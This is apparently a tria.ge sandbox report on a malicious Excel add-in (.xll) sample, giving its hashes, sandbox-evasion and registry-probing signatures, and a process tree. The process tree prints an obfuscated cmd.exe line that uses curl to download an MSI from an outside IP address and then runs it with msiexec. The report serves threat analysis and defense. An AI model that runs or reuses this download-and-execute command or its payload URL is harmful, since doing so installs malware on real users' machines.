Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
169s -
max time network
200s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
11/10/2023, 14:04
Static task
static1
Behavioral task
behavioral1
Sample
a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50_JC.xll
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50_JC.xll
Resource
win10v2004-20230915-en
General
-
Target
a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50_JC.xll
-
Size
12KB
-
MD5
ad86b0520d48a0b530915850244f196b
-
SHA1
2d28250d44de5ce82ded47bfb29a8ae6353a3fa4
-
SHA256
a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50
-
SHA512
138934773d669a60900a82ee011f781576dc82275b4c62e696472e1d5890c2b155bf60ecab4eefc1345d4c42fe125078013ee242b8581f28ad735cb288cb1a39
-
SSDEEP
192:uU5z9iLjq2pJk+/qcJklyJOEd8LsWGQwrgAh:3z9AbJH/IwJOs3/QwrgC
Malware Config
Extracted
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 216 1776 cmd.exe 17 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 2 IoCs
pid Process 1776 EXCEL.EXE 1776 EXCEL.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Delays execution with timeout.exe 1 IoCs
pid Process 5048 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1776 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeShutdownPrivilege 3584 msiexec.exe Token: SeIncreaseQuotaPrivilege 3584 msiexec.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1776 EXCEL.EXE 1776 EXCEL.EXE 3584 msiexec.exe 3584 msiexec.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1776 EXCEL.EXE 1776 EXCEL.EXE 1776 EXCEL.EXE 1776 EXCEL.EXE 1776 EXCEL.EXE 1776 EXCEL.EXE 1776 EXCEL.EXE 1776 EXCEL.EXE 1776 EXCEL.EXE 1776 EXCEL.EXE 1776 EXCEL.EXE 1776 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1776 wrote to memory of 216 1776 EXCEL.EXE 88 PID 1776 wrote to memory of 216 1776 EXCEL.EXE 88 PID 216 wrote to memory of 4672 216 cmd.exe 90 PID 216 wrote to memory of 4672 216 cmd.exe 90 PID 216 wrote to memory of 5048 216 cmd.exe 91 PID 216 wrote to memory of 5048 216 cmd.exe 91 PID 216 wrote to memory of 3584 216 cmd.exe 100 PID 216 wrote to memory of 3584 216 cmd.exe 100
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50_JC.xll"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1776 -
\??\c:\windows\system32\cmd.exec:\windows\system32\cmd.exe /c c^url -o c:\users\public\1.msi http://51.195.49.233/dGp9oe/rAoeU0&&timeout 10&&c:\users\public\1.msi2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\system32\curl.execurl -o c:\users\public\1.msi http://51.195.49.233/dGp9oe/rAoeU03⤵PID:4672
-
-
C:\Windows\system32\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
PID:5048
-
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\users\public\1.msi"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3584
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50_JC.xll
Filesize12KB
MD5ad86b0520d48a0b530915850244f196b
SHA12d28250d44de5ce82ded47bfb29a8ae6353a3fa4
SHA256a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50
SHA512138934773d669a60900a82ee011f781576dc82275b4c62e696472e1d5890c2b155bf60ecab4eefc1345d4c42fe125078013ee242b8581f28ad735cb288cb1a39
-
C:\Users\Admin\AppData\Local\Temp\a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50_JC.xll
Filesize12KB
MD5ad86b0520d48a0b530915850244f196b
SHA12d28250d44de5ce82ded47bfb29a8ae6353a3fa4
SHA256a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50
SHA512138934773d669a60900a82ee011f781576dc82275b4c62e696472e1d5890c2b155bf60ecab4eefc1345d4c42fe125078013ee242b8581f28ad735cb288cb1a39